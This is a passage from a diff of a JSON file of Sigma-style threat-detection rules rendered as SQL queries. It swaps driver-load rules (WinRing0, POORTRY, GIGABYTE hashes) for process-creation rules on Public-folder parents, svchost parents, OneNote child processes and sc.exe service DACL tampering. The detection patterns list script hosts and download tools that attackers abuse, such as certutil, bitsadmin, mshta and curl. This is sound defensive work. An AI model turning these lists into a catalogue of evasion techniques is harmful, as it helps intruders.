'9254F012009D55F555418FF85F7D93B184AB7CB0E37AECDFDAB62CFE94DEA96B', '984A77E5424C6D099051441005F2938AE92B31B5AD8F6521C6B001932862ADD7', '98B734DDA78C16EBCAA4AFEB31007926542B63B2F163B2F733FA0D00DBB344D8', '99F4994A0E5BD1BF6E3F637D3225C69FF4CD620557E23637533E7F18D7D6CBA1', '9C10E2EC4F9EF591415F9A784B93DC9C9CDAFA7C69602C0DC860C5B62222E449', 'A961F5939088238D76757669A9A81905E33F247C9C635B908DAAC146AE063499', 'A9706E320179993DADE519A83061477ACE195DAA1B788662825484813001F526', 'B7A20B5F15E1871B392782C46EBCC897929443D82073EE4DCB3874B6A5976B5D', 'CC586254E9E89E88334ADEE44E332166119307E79C2F18F6C2AB90CE8BA7FC9B', 'CD4A249C3EF65AF285D0F8F30A8A96E83688486AAB515836318A2559757A89BB', 'CF4B5FA853CE809F1924DF3A3AE3C4E191878C4EA5248D8785DC7E51807A512B', 'D0BD1AE72AEB5F3EABF1531A635F990E5EAAE7FDD560342F915F723766C80889', 'D8B58F6A89A7618558E37AFC360CD772B6731E3BA367F8D58734ECEE2244A530', 'D92EAB70BCECE4432258C9C9A914483A2267F6AB5CE2630048D3A99E8CB1B482', 'E005E8D183E853A27AD3BB56F25489F369C11B0D47E3D4095AAD9291B3343BF1', 'E68D453D333854787F8470C8BAEF3E0D082F26DF5AA19C0493898BCF3401E39A', 'E83908EBA2501A00EF9E74E7D1C8B4FF1279F1CD6051707FD51824F87E4378FA', 'EF86C4E5EE1DBC4F81CD864E8CD2F4A2A85EE4475B9A9AB698A4AE1CC71FBEB0', 'F088B2BA27DACD5C28F8EE428F1350DCA4BC7C6606309C287C801B2E1DA1A53D', 'FD8669794C67B396C12FC5F08E9C004FDF851A82FAF302846878173E4FBECB03', '91314768DA140999E682D2A290D48B78BB25A35525EA12C1B1F9634D14602B2C', 'F0605DDA1DEF240DC7E14EFA73927D6C6D89988C01EA8647B671667B2B167008', '6CB51AE871FBD5D07C5AAD6FF8EEA43D34063089528603CA9CEB8B4F52F68DDC', 'DB2A9247177E8CDD50FE9433D066B86FFD2A84301AA6B2EB60F361CFFF077004', '7EC93F34EB323823EB199FBF8D06219086D517D0E8F4B9E348D7AFD41EC9FD5D', '7049F3C939EFE76A5556C2A2C04386DB51DAF61D56B679F4868BB0983C996EBB', '7877C1B0E7429453B750218CA491C2825DAE684AD9616642EFF7B41715C70ACA', '159E7C5A12157AF92E0D14A0D3EA116F91C09E21A9831486E6DC592C93C10980', '3243AAB18E273A9B9C4280A57AECEF278E10BFFF19ABB260D7A7820E41739099', '7CFA5E10DFF8A99A5D544B011F676BC383991274C693E21E3AF40CF6982ADB8C', 'C9B49B52B493B53CD49C12C3FA9553E57C5394555B64E32D1208F5B96A5B8C6E', '3EC5AD51E6879464DFBCCB9F4ED76C6325056A42548D5994BA869DA9C4C039A8', '47EAEBC920CCF99E09FC9924FEB6B19B8A28589F52783327067C9B09754B5E84', '80599708ce61ec5d6dcfc5977208a2a0be2252820a88d9ba260d8cdf5dc7fbe4', '9091e044273ff624585235ac885eb2b05dfb12f3022dcf535b178ff1b2e012d1', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '41cceace9751dce2b6ecaedc9a2d374fbb6458cf93b00a1dcd634ad0bc54ef89', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', 'e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', '39937d239220c1b779d7d55613de2c0a48bd6e12e0214da4c65992b96cf591df', '7ed26a593524a2a92ffcfb075a42bb4fa4775ffbf83af98525244a4710886ead', 'aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16', 'ff5f6048a3d6f6738b60e911e3876fcbdc9a02ec9862f909345c8a50fd4cc0a7', '952199C28332BC90CFD74530A77EE237967ED32B3C71322559C59F7A42187DC4', '9529EFB1837B1005E5E8F477773752078E0A46500C748BC30C9B5084D04082E6', 'A7B000ABBCC344444A9B00CFADE7AA22AB92CE0CADEC196C30EB1851AE4FA062', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', 'd205286bffdf09bc033c09e95c519c1c267b40c2ee8bab703c6a2d86741ccd3e', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', 'f929bead59e9424ab90427b379dcdd63fbfe0c4fb5e1792e3a1685541cd5ec65', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', 'fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2', 'ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', 'a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', '3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b', '478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82', '4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7', 'b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038', 'ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89', '73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e', '87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3', '2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', 'e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf', '1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea', 'd84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5', '5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a', '0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003', '26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7', '42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498', '1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22', '9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de', 'fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', '175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347', '8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', '7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%wscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%cscript.exe%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%mshta.exe%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_execution_from_public_folder_as_parent.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", + "title": "Suspicious Svchost Process", + "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", + "description": "Detects a suspicious svchost process start", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_svchost_susp_parent_process.yml" }, { - "title": "Usage Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", - "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "status": "test", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", + "attack.persistence", "attack.t1543.003" ], "falsepositives": [ @@ -5668,99 +5500,95 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN 